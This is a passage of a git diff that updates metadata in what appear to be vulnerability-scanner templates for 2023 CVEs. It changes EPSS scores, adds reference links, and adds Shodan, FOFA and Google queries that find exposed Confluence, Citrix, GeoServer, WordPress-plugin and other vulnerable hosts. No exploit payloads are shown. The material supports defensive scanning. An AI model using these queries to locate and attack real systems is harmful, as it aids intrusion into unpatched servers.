b/http/cves/2023/CVE-2023-2227.yaml @@ -15,12 +15,14 @@ info: cvss-score: 9.1 cve-id: CVE-2023-2227 cwe-id: CWE-285 + epss-score: 0.01292 + epss-percentile: 0.85804 cpe: cpe:2.3:a:modoboa:modoboa:*:*:*:*:*:*:*:* metadata: vendor: modoboa product: modoboa - fofa-query: body="Modoboa" shodan-query: http.favicon.hash:1949005079 + fofa-query: body="Modoboa" tags: cve,cve2023,modoboa,exposure,disclosure http: diff --git a/http/cves/2023/CVE-2023-22432.yaml b/http/cves/2023/CVE-2023-22432.yaml index 4e668bef11..6083bb470a 100644 --- a/http/cves/2023/CVE-2023-22432.yaml +++ b/http/cves/2023/CVE-2023-22432.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-22432 cwe-id: CWE-601 - epss-score: 0.00877 - epss-percentile: 0.82098 + epss-score: 0.00945 + epss-percentile: 0.83107 cpe: cpe:2.3:a:web2py:web2py:*:*:*:*:*:*:*:* metadata: verified: true @@ -28,6 +28,7 @@ info: vendor: web2py product: web2py shodan-query: http.favicon.hash:-1680052984 + fofa-query: icon_hash=-1680052984 tags: cve,cve2023,web2py,redirect,authenticated http: diff --git a/http/cves/2023/CVE-2023-22463.yaml b/http/cves/2023/CVE-2023-22463.yaml index a138f73917..31e7f7266f 100644 --- a/http/cves/2023/CVE-2023-22463.yaml +++ b/http/cves/2023/CVE-2023-22463.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-22463 cwe-id: CWE-798 - epss-score: 0.02033 - epss-percentile: 0.88693 + epss-score: 0.01936 + epss-percentile: 0.88621 cpe: cpe:2.3:a:fit2cloud:kubepi:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-22478.yaml b/http/cves/2023/CVE-2023-22478.yaml index cb4ece937a..a597b15ad2 100644 --- a/http/cves/2023/CVE-2023-22478.yaml +++ b/http/cves/2023/CVE-2023-22478.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-22478 cwe-id: CWE-862 - epss-score: 0.03365 - epss-percentile: 0.91177 + epss-score: 0.07825 + epss-percentile: 0.94208 cpe: cpe:2.3:a:fit2cloud:kubepi:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-22480.yaml b/http/cves/2023/CVE-2023-22480.yaml index bb42a9d8b3..5e9e4c3848 100644 --- a/http/cves/2023/CVE-2023-22480.yaml +++ b/http/cves/2023/CVE-2023-22480.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-22480 cwe-id: CWE-863,CWE-285 - epss-score: 0.01487 - epss-percentile: 0.86532 + epss-score: 0.03554 + epss-percentile: 0.91598 cpe: cpe:2.3:a:fit2cloud:kubeoperator:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-22515.yaml b/http/cves/2023/CVE-2023-22515.yaml index e27bd57a93..42bdbd181c 100644 --- a/http/cves/2023/CVE-2023-22515.yaml +++ b/http/cves/2023/CVE-2023-22515.yaml @@ -18,14 +18,15 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-22515 - epss-score: 0.95682 - epss-percentile: 0.99291 + epss-score: 0.97313 + epss-percentile: 0.99875 cpe: cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:* metadata: verified: true max-request: 6 vendor: atlassian product: confluence_data_center + shodan-query: http.component:"atlassian confluence" fofa-query: app="ATLASSIAN-Confluence" tags: cve2023,cve,confluence,auth-bypass,kev,intrusive,atlassian variables: diff --git a/http/cves/2023/CVE-2023-22518.yaml b/http/cves/2023/CVE-2023-22518.yaml index f78c29e559..60b9df90e3 100644 --- a/http/cves/2023/CVE-2023-22518.yaml +++ b/http/cves/2023/CVE-2023-22518.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-22518 cwe-id: CWE-863 - epss-score: 0.97011 - epss-percentile: 0.99725 + epss-score: 0.96267 + epss-percentile: 0.99528 cpe: cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:* metadata: verified: true @@ -27,6 +27,7 @@ info: vendor: atlassian product: confluence_data_center shodan-query: http.component:"Atlassian Confluence" + fofa-query: app="atlassian-confluence" note: this template attempts to validate the vulnerability by uploading an invalid (empty) zip file. This is a safe method for checking vulnerability and will not cause data loss or database reset. In real attack scenarios, a malicious file could potentially be used causing more severe impacts. tags: cve,cve2023,atlassian,confluence,rce,unauth,intrusive,kev diff --git a/http/cves/2023/CVE-2023-2252.yaml b/http/cves/2023/CVE-2023-2252.yaml index 22fe7e3409..af36609021 100644 --- a/http/cves/2023/CVE-2023-2252.yaml +++ b/http/cves/2023/CVE-2023-2252.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-2252 cwe-id: CWE-22 epss-score: 0.00129 - epss-percentile: 0.46802 + epss-percentile: 0.4773 cpe: cpe:2.3:a:wpwax:directorist:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-22527.yaml b/http/cves/2023/CVE-2023-22527.yaml index aaed7fb243..3e8b5fb5f5 100644 --- a/http/cves/2023/CVE-2023-22527.yaml +++ b/http/cves/2023/CVE-2023-22527.yaml @@ -18,15 +18,16 @@ info: cvss-score: 9.8 cve-id: CVE-2023-22527 cwe-id: CWE-74 - epss-score: 0.96568 - epss-percentile: 0.99595 + epss-score: 0.97459 + epss-percentile: 0.99955 cpe: cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: atlassian product: confluence_data_center shodan-query: http.component:"Atlassian Confluence" - tags: cve,cve2023,confluence,rce,ssti,kev + fofa-query: app="atlassian-confluence" + tags: packetstorm,cve,cve2023,confluence,rce,ssti,kev http: - raw: diff --git a/http/cves/2023/CVE-2023-22620.yaml b/http/cves/2023/CVE-2023-22620.yaml index ab98f22962..43abde8090 100644 --- a/http/cves/2023/CVE-2023-22620.yaml +++ b/http/cves/2023/CVE-2023-22620.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-22620 cwe-id: CWE-863 - epss-score: 0.06157 - epss-percentile: 0.92833 + epss-score: 0.03698 + epss-percentile: 0.91758 cpe: cpe:2.3:o:securepoint:unified_threat_management:*:*:*:*:*:*:*:* metadata: verified: true @@ -29,6 +29,8 @@ info: vendor: securepoint product: unified_threat_management shodan-query: title:"Securepoint UTM" + fofa-query: title="securepoint utm" + google-query: intitle:"securepoint utm" tags: cve,cve2023,utm,leak,memory,packetstorm,securepoint http: diff --git a/http/cves/2023/CVE-2023-2272.yaml b/http/cves/2023/CVE-2023-2272.yaml index b159a55c12..c852e683c0 100644 --- a/http/cves/2023/CVE-2023-2272.yaml +++ b/http/cves/2023/CVE-2023-2272.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-2272 cwe-id: CWE-79 - epss-score: 0.00064 - epss-percentile: 0.26204 + epss-score: 0.00071 + epss-percentile: 0.30429 cpe: cpe:2.3:a:tiempo:tiempo:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-22897.yaml b/http/cves/2023/CVE-2023-22897.yaml index d52b60279c..5cebe1e454 100644 --- a/http/cves/2023/CVE-2023-22897.yaml +++ b/http/cves/2023/CVE-2023-22897.yaml @@ -15,13 +15,14 @@ info: - https://github.com/MrTuxracer/advisories/blob/master/CVEs/CVE-2023-22897.txt - https://www.rcesecurity.com/2023/04/securepwn-part-2-leaking-remote-memory-contents-cve-2023-22897/ - https://rcesecurity.com + - https://github.com/MrTuxracer/advisories classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N cvss-score: 6.5 cve-id: CVE-2023-22897 cwe-id: CWE-908 - epss-score: 0.03131 - epss-percentile: 0.90084 + epss-score: 0.03238 + epss-percentile: 0.91228 cpe: cpe:2.3:o:securepoint:unified_threat_management:*:*:*:*:*:*:*:* metadata: verified: true @@ -29,6 +30,8 @@ info: vendor: securepoint product: unified_threat_management shodan-query: title:"Securepoint UTM" + fofa-query: title="securepoint utm" + google-query: intitle:"securepoint utm" tags: cve,cve2023,securepoint,utm,exposure,memory http: diff --git a/http/cves/2023/CVE-2023-23161.yaml b/http/cves/2023/CVE-2023-23161.yaml index 4ae8b59b80..6a6de73694 100644 --- a/http/cves/2023/CVE-2023-23161.yaml +++ b/http/cves/2023/CVE-2023-23161.yaml @@ -21,8 +21,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-23161 cwe-id: CWE-79 - epss-score: 0.00107 - epss-percentile: 0.43178 + epss-score: 0.00315 + epss-percentile: 0.702 cpe: cpe:2.3:a:phpgurukul:art_gallery_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-23333.yaml b/http/cves/2023/CVE-2023-23333.yaml index de9d21f533..870e53afa4 100644 --- a/http/cves/2023/CVE-2023-23333.yaml +++ b/http/cves/2023/CVE-2023-23333.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-23333 cwe-id: CWE-77 - epss-score: 0.40081 - epss-percentile: 0.96928 + epss-score: 0.96326 + epss-percentile: 0.99545 cpe: cpe:2.3:o:contec:solarview_compact_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-23488.yaml b/http/cves/2023/CVE-2023-23488.yaml index cc92209152..230471e3c6 100644 --- a/http/cves/2023/CVE-2023-23488.yaml +++ b/http/cves/2023/CVE-2023-23488.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-23488 cwe-id: CWE-89 - epss-score: 0.05507 - epss-percentile: 0.92486 + epss-score: 0.05363 + epss-percentile: 0.93093 cpe: cpe:2.3:a:strangerstudios:paid_memberships_pro:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -30,6 +30,10 @@ info: vendor: strangerstudios product: paid_memberships_pro framework: wordpress + shodan-query: http.html:/wp-content/plugins/paid-memberships-pro/ + fofa-query: body=/wp-content/plugins/paid-memberships-pro/ + publicwww-query: /wp-content/plugins/paid-memberships-pro/ + google-query: inurl:"/wp-content/plugins/paid-memberships-pro" tags: cve2023,cve,paid-memberships-pro,wordpress,tenable,packetstorm,wp-plugin,sqli,wp,strangerstudios http: diff --git a/http/cves/2023/CVE-2023-23489.yaml b/http/cves/2023/CVE-2023-23489.yaml index d6f8c53b56..21341d813d 100644 --- a/http/cves/2023/CVE-2023-23489.yaml +++ b/http/cves/2023/CVE-2023-23489.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-23489 cwe-id: CWE-89 - epss-score: 0.10655 - epss-percentile: 0.94927 + epss-score: 0.11793 + epss-percentile: 0.95309 cpe: cpe:2.3:a:sandhillsdev:easy_digital_downloads:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-23491.yaml b/http/cves/2023/CVE-2023-23491.yaml index eda7da80c5..0dbd72dd1e 100644 --- a/http/cves/2023/CVE-2023-23491.yaml +++ b/http/cves/2023/CVE-2023-23491.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-23491 cwe-id: CWE-79 - epss-score: 0.00119 - epss-percentile: 0.45193 + epss-score: 0.0012 + epss-percentile: 0.46205 cpe: cpe:2.3:a:fullworksplugins:quick_event_manager:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,6 +26,8 @@ info: vendor: fullworksplugins product: quick_event_manager framework: wordpress + shodan-query: http.html:/wp-content/plugins/quick-event-manager + fofa-query: body=/wp-content/plugins/quick-event-manager publicwww-query: "/wp-content/plugins/quick-event-manager" tags: cve2023,cve,wordpress,wp,wp-plugin,wpscan,xss,quick-event-manager,fullworksplugins diff --git a/http/cves/2023/CVE-2023-23492.yaml b/http/cves/2023/CVE-2023-23492.yaml index 37f3c3f73a..5eed092666 100644 --- a/http/cves/2023/CVE-2023-23492.yaml +++ b/http/cves/2023/CVE-2023-23492.yaml @@ -14,13 +14,15 @@ info: - https://wordpress.org/plugins/login-with-phone-number/ - https://www.tenable.com/security/research/tra-2023-3 - https://nvd.nist.gov/vuln/detail/CVE-2023-23492 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2023-23492 cwe-id: CWE-89 - epss-score: 0.05192 - epss-percentile: 0.92229 + epss-score: 0.06178 + epss-percentile: 0.93551 cpe: cpe:2.3:a:idehweb:login_with_phone_number:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-2356.yaml b/http/cves/2023/CVE-2023-2356.yaml index 04fa783e7a..32942a9671 100644 --- a/http/cves/2023/CVE-2023-2356.yaml +++ b/http/cves/2023/CVE-2023-2356.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-2356 cwe-id: CWE-23 - epss-score: 0.00875 - epss-percentile: 0.82072 + epss-score: 0.01406 + epss-percentile: 0.86426 cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:* metadata: verified: true @@ -31,6 +31,7 @@ info: product: mlflow shodan-query: http.title:"mlflow" fofa-query: app="MLflow" + google-query: intitle:"mlflow" tags: cve2023,cve,lfi,huntr,mlflow,oss,intrusive,lfprojects variables: str: "{{rand_base(6)}}" diff --git a/http/cves/2023/CVE-2023-23752.yaml b/http/cves/2023/CVE-2023-23752.yaml index 6d0fee1022..def70983fc 100644 --- a/http/cves/2023/CVE-2023-23752.yaml +++ b/http/cves/2023/CVE-2023-23752.yaml @@ -19,8 +19,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2023-23752 - epss-score: 0.96314 - epss-percentile: 0.9944 + epss-score: 0.93208 + epss-percentile: 0.99053 cpe: cpe:2.3:a:joomla:joomla\!:*:*:*:*:*:*:*:* metadata: verified: true @@ -28,6 +28,7 @@ info: vendor: joomla product: joomla\! shodan-query: html:"Joomla! - Open Source Content Management" + fofa-query: body="joomla! - open source content management" tags: cve,cve2023,joomla,kev http: diff --git a/http/cves/2023/CVE-2023-24044.yaml b/http/cves/2023/CVE-2023-24044.yaml index 5661dadb7d..8ffeb915f2 100644 --- a/http/cves/2023/CVE-2023-24044.yaml +++ b/http/cves/2023/CVE-2023-24044.yaml @@ -21,8 +21,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-24044 cwe-id: CWE-601 - epss-score: 0.00155 - epss-percentile: 0.51774 + epss-score: 0.00174 + epss-percentile: 0.54488 cpe: cpe:2.3:a:plesk:obsidian:*:*:*:*:*:*:*:* metadata: verified: true @@ -31,6 +31,7 @@ info: product: obsidian shodan-query: title:"Plesk Obsidian" fofa-query: title="Plesk Obsidian" + google-query: intitle:"plesk obsidian" tags: cve2023,cve,header,injection,plesk,obsidian http: diff --git a/http/cves/2023/CVE-2023-24243.yaml b/http/cves/2023/CVE-2023-24243.yaml index 0634d19106..276c8e855f 100644 --- a/http/cves/2023/CVE-2023-24243.yaml +++ b/http/cves/2023/CVE-2023-24243.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-24243 cwe-id: CWE-918 - epss-score: 0.00541 - epss-percentile: 0.7489 + epss-score: 0.01019 + epss-percentile: 0.83727 cpe: cpe:2.3:a:cdata:arc:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-24278.yaml b/http/cves/2023/CVE-2023-24278.yaml index b046979578..cff34a912b 100644 --- a/http/cves/2023/CVE-2023-24278.yaml +++ b/http/cves/2023/CVE-2023-24278.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-24278 cwe-id: CWE-79 - epss-score: 0.0011 - epss-percentile: 0.4314 + epss-score: 0.00158 + epss-percentile: 0.52245 cpe: cpe:2.3:a:squidex.io:squidex:*:*:*:*:*:*:*:* metadata: verified: true @@ -29,6 +29,7 @@ info: vendor: squidex.io product: squidex shodan-query: http.favicon.hash:1099097618 + fofa-query: icon_hash=1099097618 tags: cve2023,cve,xss,squidex,cms,unauth,squidex.io http: diff --git a/http/cves/2023/CVE-2023-24322.yaml b/http/cves/2023/CVE-2023-24322.yaml index 59b943a776..1e612e38c9 100644 --- a/http/cves/2023/CVE-2023-24322.yaml +++ b/http/cves/2023/CVE-2023-24322.yaml @@ -13,13 +13,14 @@ info: - https://github.com/i7MEDIA/mojoportal/ - https://www.mojoportal.com/ - https://nvd.nist.gov/vuln/detail/CVE-2023-24322 + - https://github.com/blakduk/Advisories classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2023-24322 cwe-id: CWE-79 - epss-score: 0.0009 - epss-percentile: 0.37778 + epss-score: 0.00157 + epss-percentile: 0.52131 cpe: cpe:2.3:a:mojoportal:mojoportal:2.7.0.0:*:*:*:*:*:*:* metadata: verified: true @@ -27,6 +28,7 @@ info: vendor: mojoportal product: mojoportal shodan-query: html:"mojoPortal" + fofa-query: body="mojoportal" tags: cve,cve2023,cves,mojoportal,xss http: diff --git a/http/cves/2023/CVE-2023-24488.yaml b/http/cves/2023/CVE-2023-24488.yaml index cc500b1fe8..38441aeee6 100644 --- a/http/cves/2023/CVE-2023-24488.yaml +++ b/http/cves/2023/CVE-2023-24488.yaml @@ -21,14 +21,16 @@ info: cvss-score: 6.1 cve-id: CVE-2023-24488 cwe-id: CWE-79 - epss-score: 0.0101 - epss-percentile: 0.8202 + epss-score: 0.05227 + epss-percentile: 0.93007 cpe: cpe:2.3:a:citrix:gateway:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: citrix product: gateway shodan-query: title:"Citrix Gateway" + fofa-query: title="citrix gateway" + google-query: intitle:"citrix gateway" tags: cve2023,cve,citrix,xss,adc http: diff --git a/http/cves/2023/CVE-2023-24489.yaml b/http/cves/2023/CVE-2023-24489.yaml index 904c250e19..cfe10e1c0c 100644 --- a/http/cves/2023/CVE-2023-24489.yaml +++ b/http/cves/2023/CVE-2023-24489.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-24489 cwe-id: CWE-284,NVD-CWE-Other - epss-score: 0.97362 - epss-percentile: 0.99893 + epss-score: 0.9742 + epss-percentile: 0.99933 cpe: cpe:2.3:a:citrix:sharefile_storage_zones_controller:*:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,8 @@ info: vendor: citrix product: sharefile_storage_zones_controller shodan-query: title:"ShareFile Storage Server" + fofa-query: title="sharefile storage server" + google-query: intitle:"sharefile storage server" tags: cve2023,cve,sharefile,rce,intrusive,fileupload,fuzz,kev,citrix variables: fileName: '{{rand_base(8)}}' diff --git a/http/cves/2023/CVE-2023-24657.yaml b/http/cves/2023/CVE-2023-24657.yaml index a29dc98497..41b6ab4fec 100644 --- a/http/cves/2023/CVE-2023-24657.yaml +++ b/http/cves/2023/CVE-2023-24657.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-24657 cwe-id: CWE-79 - epss-score: 0.03111 - epss-percentile: 0.90058 + epss-score: 0.01878 + epss-percentile: 0.88418 cpe: cpe:2.3:a:phpipam:phpipam:1.6:*:*:*:*:*:*:* metadata: verified: true @@ -27,6 +27,7 @@ info: vendor: phpipam product: phpipam shodan-query: html:"phpIPAM IP address management" + fofa-query: body="phpipam ip address management" tags: cve2023,cve,xss,phpipam,authenticated http: diff --git a/http/cves/2023/CVE-2023-24733.yaml b/http/cves/2023/CVE-2023-24733.yaml index f6b110e77e..69d9f78a53 100644 --- a/http/cves/2023/CVE-2023-24733.yaml +++ b/http/cves/2023/CVE-2023-24733.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-24733 cwe-id: CWE-79 - epss-score: 0.00097 - epss-percentile: 0.39455 + epss-score: 0.00099 + epss-percentile: 0.41025 cpe: cpe:2.3:a:sigb:pmb:7.4.6:*:*:*:*:*:*:* metadata: verified: true @@ -28,6 +28,7 @@ info: vendor: sigb product: pmb shodan-query: http.favicon.hash:1469328760 + fofa-query: body="pmb group" tags: cve,cve2023,unauth,xss,pmb,pmb_project http: diff --git a/http/cves/2023/CVE-2023-24735.yaml b/http/cves/2023/CVE-2023-24735.yaml index d04f3ed161..9c5546ff00 100644 --- a/http/cves/2023/CVE-2023-24735.yaml +++ b/http/cves/2023/CVE-2023-24735.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-24735 cwe-id: CWE-601 - epss-score: 0.00947 - epss-percentile: 0.8279 + epss-score: 0.0116 + epss-percentile: 0.84859 cpe: cpe:2.3:a:sigb:pmb:7.4.6:*:*:*:*:*:*:* metadata: verified: true @@ -28,6 +28,7 @@ info: vendor: sigb product: pmb shodan-query: http.favicon.hash:1469328760 + fofa-query: body="pmb group" tags: cve2023,cve,redirect,pmb,pmb_project http: diff --git a/http/cves/2023/CVE-2023-24737.yaml b/http/cves/2023/CVE-2023-24737.yaml index 91572fef17..daf4ce9c0e 100644 --- a/http/cves/2023/CVE-2023-24737.yaml +++ b/http/cves/2023/CVE-2023-24737.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-24737 cwe-id: CWE-79 - epss-score: 0.00097 - epss-percentile: 0.39455 + epss-score: 0.00099 + epss-percentile: 0.41025 cpe: cpe:2.3:a:sigb:pmb:7.4.6:*:*:*:*:*:*:* metadata: verified: true @@ -28,6 +28,7 @@ info: vendor: sigb product: pmb shodan-query: http.favicon.hash:1469328760 + fofa-query: body="pmb group" tags: cve2023,cve,xss,pmb,pmb_project http: diff --git a/http/cves/2023/CVE-2023-2479.yaml b/http/cves/2023/CVE-2023-2479.yaml index 5cc676336d..c412ab515a 100644 --- a/http/cves/2023/CVE-2023-2479.yaml +++ b/http/cves/2023/CVE-2023-2479.yaml @@ -11,13 +11,15 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2023-2479 - https://huntr.dev/bounties/fbdeec3c-d197-4a68-a547-7f93fb9594b4/ - https://github.com/appium/appium-desktop/commit/12a988aa08b9822e97056a09486c9bebb3aad8fe + - https://github.com/Marco-zcl/POC + - https://github.com/d4n-sec/d4n-sec.github.io classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-2479 cwe-id: CWE-78 - epss-score: 0.95882 - epss-percentile: 0.99324 + epss-score: 0.96532 + epss-percentile: 0.99605 cpe: cpe:2.3:a:appium:appium-desktop:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2023/CVE-2023-25135.yaml b/http/cves/2023/CVE-2023-25135.yaml index b5e1f0a9b1..9c196102e7 100644 --- a/http/cves/2023/CVE-2023-25135.yaml +++ b/http/cves/2023/CVE-2023-25135.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2023-25135 cwe-id: CWE-502 epss-score: 0.71557 - epss-percentile: 0.97978 + epss-percentile: 0.98058 cpe: cpe:2.3:a:vbulletin:vbulletin:5.6.7:-:*:*:*:*:*:* metadata: verified: true @@ -29,6 +29,7 @@ info: vendor: vbulletin product: vbulletin shodan-query: http.component:"vBulletin" + fofa-query: body="powered by vbulletin" google-query: intext:"Powered By vBulletin" tags: cve,cve2023,vbulletin,rce diff --git a/http/cves/2023/CVE-2023-25157.yaml b/http/cves/2023/CVE-2023-25157.yaml index fbf7804509..be536f257c 100644 --- a/http/cves/2023/CVE-2023-25157.yaml +++ b/http/cves/2023/CVE-2023-25157.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-25157 cwe-id: CWE-89 - epss-score: 0.41862 - epss-percentile: 0.96974 + epss-score: 0.59299 + epss-percentile: 0.97754 cpe: cpe:2.3:a:osgeo:geoserver:*:*:*:*:*:*:*:* metadata: verified: "true" @@ -30,6 +30,8 @@ info: vendor: osgeo product: geoserver shodan-query: title:"geoserver" + fofa-query: title="geoserver" + google-query: intitle:"geoserver" tags: cve2023,cve,geoserver,ogc,sqli,intrusive,osgeo http: diff --git a/http/cves/2023/CVE-2023-25194.yaml b/http/cves/2023/CVE-2023-25194.yaml index c250daba2a..5bf9e89c79 100644 --- a/http/cves/2023/CVE-2023-25194.yaml +++ b/http/cves/2023/CVE-2023-25194.yaml @@ -17,8 +17,8 @@ info: cvss-score: 8.8 cve-id: CVE-2023-25194 cwe-id: CWE-502 - epss-score: 0.89626 - epss-percentile: 0.98692 + epss-score: 0.96717 + epss-percentile: 0.99653 cpe: cpe:2.3:a:apache:kafka_connect:*:*:*:*:*:*:*:* metadata: verified: true @@ -26,6 +26,7 @@ info: vendor: apache product: kafka_connect shodan-query: html:"Apache Druid" + fofa-query: body="apache druid" tags: packetstorm,cve,cve2023,apache,druid,kafka,rce,jndi,oast http: diff --git a/http/cves/2023/CVE-2023-25346.yaml b/http/cves/2023/CVE-2023-25346.yaml index 4f7a6a5362..da87fc1444 100644 --- a/http/cves/2023/CVE-2023-25346.yaml +++ b/http/cves/2023/CVE-2023-25346.yaml @@ -14,13 +14,15 @@ info: - https://github.com/10splayaSec/CVE-Disclosures/tree/main/ChurchCRM/CVE-2023-25346 - https://nvd.nist.gov/vuln/detail/CVE-2023-25346 - https://github.com/ChurchCRM/CRM + - https://github.com/10splayaSec/CVE-Disclosures + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2023-25346 cwe-id: CWE-79 - epss-score: 0.00089 - epss-percentile: 0.37238 + epss-score: 0.00165 + epss-percentile: 0.5311 cpe: cpe:2.3:a:churchcrm:churchcrm:4.5.3:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-25573.yaml b/http/cves/2023/CVE-2023-25573.yaml index 20143feedc..640deeabc5 100644 --- a/http/cves/2023/CVE-2023-25573.yaml +++ b/http/cves/2023/CVE-2023-25573.yaml @@ -20,14 +20,15 @@ info: cvss-score: 7.5 cve-id: CVE-2023-25573 cwe-id: CWE-862 - epss-score: 0.03674 - epss-percentile: 0.91517 + epss-score: 0.04496 + epss-percentile: 0.92455 cpe: cpe:2.3:a:metersphere:metersphere:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: metersphere product: metersphere + shodan-query: http.html:"metersphere" fofa-query: body="Metersphere" tags: cve,cve2023,metersphere,lfi variables: diff --git a/http/cves/2023/CVE-2023-25717.yaml b/http/cves/2023/CVE-2023-25717.yaml index d4d53fa150..49f04011f8 100644 --- a/http/cves/2023/CVE-2023-25717.yaml +++ b/http/cves/2023/CVE-2023-25717.yaml @@ -29,6 +29,7 @@ info: product: ruckus_wireless_admin shodan-query: title:"ruckus wireless" fofa-query: title="ruckus wireless" + google-query: intitle:"ruckus wireless" tags: cve2023,cve,ruckus,rce,kev,ruckuswireless http: diff --git a/http/cves/2023/CVE-2023-26035.yaml b/http/cves/2023/CVE-2023-26035.yaml index 6d904ca21a..103c23a2f8 100644 --- a/http/cves/2023/CVE-2023-26035.yaml +++ b/http/cves/2023/CVE-2023-26035.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-26035 cwe-id: CWE-862 - epss-score: 0.97003 - epss-percentile: 0.99723 + epss-score: 0.96928 + epss-percentile: 0.99718 cpe: cpe:2.3:a:zoneminder:zoneminder:*:*:*:*:*:*:*:* metadata: verified: true @@ -27,6 +27,7 @@ info: vendor: zoneminder product: zoneminder shodan-query: html:"ZM - Login" + fofa-query: body="zm - login" tags: cve,cve2023,rce,zoneminder,unauth,packetstorm flow: http(1) && http(2) diff --git a/http/cves/2023/CVE-2023-26255.yaml b/http/cves/2023/CVE-2023-26255.yaml index ed2bac0af9..f61456c077 100644 --- a/http/cves/2023/CVE-2023-26255.yaml +++ b/http/cves/2023/CVE-2023-26255.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-26255 cwe-id: CWE-22 - epss-score: 0.15138 - epss-percentile: 0.95663 + epss-score: 0.12537 + epss-percentile: 0.95441 cpe: cpe:2.3:a:stagil:stagil_navigation:*:*:*:*:*:jira:*:* metadata: max-request: 1 @@ -30,6 +30,8 @@ info: product: stagil_navigation framework: jira shodan-query: title:Jira + fofa-query: title=jira + google-query: intitle:jira tags: cve2023,cve,lfi,jira,cms,atlassian,stagil http: diff --git a/http/cves/2023/CVE-2023-26256.yaml b/http/cves/2023/CVE-2023-26256.yaml index 953ef7762d..a68539f2c6 100644 --- a/http/cves/2023/CVE-2023-26256.yaml +++ b/http/cves/2023/CVE-2023-26256.yaml @@ -14,13 +14,15 @@ info: - https://github.com/1nters3ct/CVEs/blob/main/CVE-2023-26256.md - https://marketplace.atlassian.com/apps/1216090/stagil-navigation-for-jira-menus-themes?tab=overview&hosting=cloud - https://nvd.nist.gov/vuln/detail/CVE-2023-26256 + - https://github.com/0x7eTeam/CVE-2023-26256 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2023-26256 cwe-id: CWE-22 - 